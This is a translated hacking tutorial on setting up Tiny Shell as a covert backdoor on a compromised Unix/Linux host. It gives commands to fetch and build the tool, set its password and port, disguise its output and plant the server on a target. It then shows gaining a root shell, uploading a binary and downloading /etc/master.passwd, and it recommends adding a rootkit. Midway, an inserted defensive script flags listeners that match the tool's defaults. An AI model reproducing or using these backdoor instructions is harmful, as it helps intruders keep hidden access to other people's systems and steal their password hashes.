Lightweight Shell tools in Unix/Linux systems


By: dahubaobao

I. Preface
With the growth of the Internet, more and more Unix/Linux systems are in use, and breaking into a Unix/Linux system is no longer difficult. After a successful intrusion, one or more backdoors are usually left behind for getting back in. Unix/Linux systems have many kinds of backdoors. The simple ones modify the .rhosts file, copy a shell into a hidden directory, or edit the /etc/passwd file to add a user. The more advanced kind is the kernel-module backdoor (Rootkit), the highest-level backdoor on Unix/Linux and probably the most concealed. But today I am not talking about Rootkits: they are too complex to use, and even harder for people without Unix/Linux experience. Tiny Shell is a lightweight shell tool for Unix/Linux systems that is not only small but also supports a number of other good features. Details follow.

II. Application
1. Introduction to Tiny Shell
Tiny Shell is a lightweight standard remote shell tool. It provides remote command execution (like rlogin, telnet and ssh) and file transfer (upload and download), and supports pseudo-terminal pairs (pty/tty). It uses strong 160-bit RC4 encryption to evade sniffers, and strong encryption and authentication with AES-128 + HMAC-SHA1. Supported systems include FreeBSD, NetBSD, OpenBSD, Solaris, SunOS, HP-UX, IRIX, Cygwin, Linux and others.

2. Tiny Shell application
Test environment:
Local: OpenBSD 3.4, IP: 192.168.0.40
Target: FreeBSD 4.9-STABLE, IP: 192.168.0.20

Download Tiny Shell, unpack it, and modify the source so that the tool better meets our requirements.
# fetch http://www.ringz.org/tsh-0.6.tgz
# tar zxvf tsh-0.6.tgz
# cd tsh-0.6
# ls
ChangeLog  README  aes.h  pel.h  sha1.h  tsh.h
Makefile   aes.c   pel.c  sha1.c tsh.c  tshd.c
# vi tsh.h
char *secret = "replace with your password";
// Change this to the password used to connect to the backdoor; I set it to dahubaobao. The main program of this backdoor is tsh.c; look at this part of its source first:
if (password == NULL)
{
    /* 1st try, using the built-in secret key */
    ret = pel_client_init(server, secret);
    if (ret != PEL_SUCCESS)
    {
        close(server);
        /* secret key invalid, so ask for a password */
        password = getpass("Password: ");
        goto connect;
    }
}
// Focus on this line: ret = pel_client_init(server, secret);
The secret variable is passed as the parameter, i.e. it is the password required to connect to the backdoor. Now you see why tsh.h was modified.

#define SERVER_PORT 7586
// The port the backdoor listens on; it can be changed to anything.

if (argc == 5 && !strcmp(argv[2], "get"))
{
    action = GET_FILE;
}
if (argc == 5 && !strcmp(argv[2], "put"))
{
    action = PUT_FILE;
}
// The backdoor provides no help text, but from this we can see that get downloads and put uploads. You can of course rename them if you like. If you want the backdoor to print usage information, add a printf statement. The simplest way: running ./tsh with no arguments prints "gethostbyname failed."; find the line fprintf(stderr, "gethostbyname failed."); in the source and replace that string with the help text you want, and ./tsh without arguments will print it. It also doubles as a small disguise. Next, compile the source.

# make
Please specify one of these targets:

make linux
make freebsd
make openbsd
make netbsd
make cygwin
make sunos
make irix
make hpux
make osf
# make openbsd
// Pick the target matching your system; compilation takes about 10 seconds (Figure 1).
Two executables are then generated in the current directory: tsh (the client) and tshd (the server). Copy tshd to the target system (FreeBSD) and run ./tshd to complete the installation. To show the environment I am using, I first run id locally: the UID of this user is 1000, an ordinary user. Then ./tsh 192.168.0.20 connects to the target host (for convenience in the test I did not add a password). We now have a shell with root privileges; running id again (on the target host this time) shows UID=0, i.e. root. uname -a echoes that this is the FreeBSD system. So the backdoor has been connected to and logged into successfully (Figure 2). The backdoor can also be given a shell command at connect time, with the syntax ./tsh 192.168.0.20 "command", for example ./tsh 192.168.0.20 "cat /etc/passwd", which connects to 192.168.0.20 and runs cat /etc/passwd, showing the whole passwd file of the target host (Figure 3). Note that in this form you are not logged into the target host; you only connect, run the single command, and return.
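As an added example that is not part of the original article: a small audit, written from the defender's side, that parses listening-socket output in `ss -ltnp` format and flags listeners matching the tshd defaults quoted above (binary name tshd, SERVER_PORT 7586) or not present on the host's baseline. The sample output is constructed, and the baseline dictionary is an assumed per-host allowlist of expected port-to-process pairs.

```python
import re
from typing import NamedTuple

# Defaults quoted in the article: tshd listens on SERVER_PORT 7586 and the server
# binary is called tshd. Both are trivially changed, so also flag anything off-baseline.
TSH_DEFAULT_PORT = 7586
TSH_BINARY_NAMES = {"tshd"}

class Finding(NamedTuple):
    address: str
    port: int
    process: str
    reasons: tuple

# Constructed sample in `ss -ltnp` format; not captured from a real host.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      128    0.0.0.0:80         0.0.0.0:*         users:(("httpd",pid=4400,fd=4))
LISTEN 0      128    0.0.0.0:7586       0.0.0.0:*         users:(("tshd",pid=2931,fd=3))
LISTEN 0      128    0.0.0.0:31337      0.0.0.0:*         users:(("httpd",pid=4410,fd=5))
"""

LISTEN_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s*(.*)$")
PROC_RE = re.compile(r'\(\("([^"]*)"')

def parse_listeners(ss_output):
    """Yield (address, port, process) per LISTEN line; process is '' if not shown."""
    for line in ss_output.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            proc = PROC_RE.search(m.group(3))
            yield m.group(1), int(m.group(2)), proc.group(1) if proc else ""

def audit_listeners(ss_output, baseline):
    """baseline maps each expected listening port to the process that should own it."""
    findings = []
    for addr, port, proc in parse_listeners(ss_output):
        reasons = []
        if port == TSH_DEFAULT_PORT:
            reasons.append("default tsh SERVER_PORT")
        if proc in TSH_BINARY_NAMES:
            reasons.append("process name matches tsh server binary")
        if port not in baseline:
            reasons.append("port not in host baseline")
        elif proc and baseline[port] != proc:
            reasons.append(f"port owned by {proc!r}, expected {baseline[port]!r}")
        if reasons:
            findings.append(Finding(addr, port, proc, tuple(reasons)))
    return findings
```

Because the port and binary name are the first things an operator changes, the baseline comparison is the check that actually matters; the default-port and name matches only confirm an unmodified build.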

Now let's look at upload and download. From the source we know that the keyword for uploading is put and for downloading is get. First, upload: run ./tsh 192.168.0.20 put <file> <target directory> to upload a file; note that the file must be in the current directory, i.e. the same directory as tsh. I uploaded a binary called back with ./tsh 192.168.0.20 put back /, which places the back file in the target's root directory. Then I connect again with ./tsh 192.168.0.20 and run ls to confirm that back has arrived on the target host (Figure 4). Now download. Its syntax is ./tsh 192.168.0.20 get <target file> <local directory>. We can fetch the most sensitive file, master.passwd (the counterpart of the shadow file on Linux): ./tsh 192.168.0.20 get /etc/master.passwd /home/dahubaobao downloads the target host's master.passwd into the local /home/dahubaobao directory. ls shows that master.passwd has arrived on the local machine (Figure 5), and vi master.passwd (Figure 6) shows the users' encrypted passwords close at hand. Note: FreeBSD user passwords are encrypted with MD5.

Summary
Tiny Shell, small as it is, is in no way inferior to similar shell tools and supports most Unix/Linux systems; it is well worth a try. Of course, this backdoor is not concealed; it can be combined with a Rootkit for reinforcement (Rootkits also provide shell tools, but they cannot compare with Tiny Shell; try it yourself if you don't believe me). For how to use a Rootkit, go to Google to find the answer.
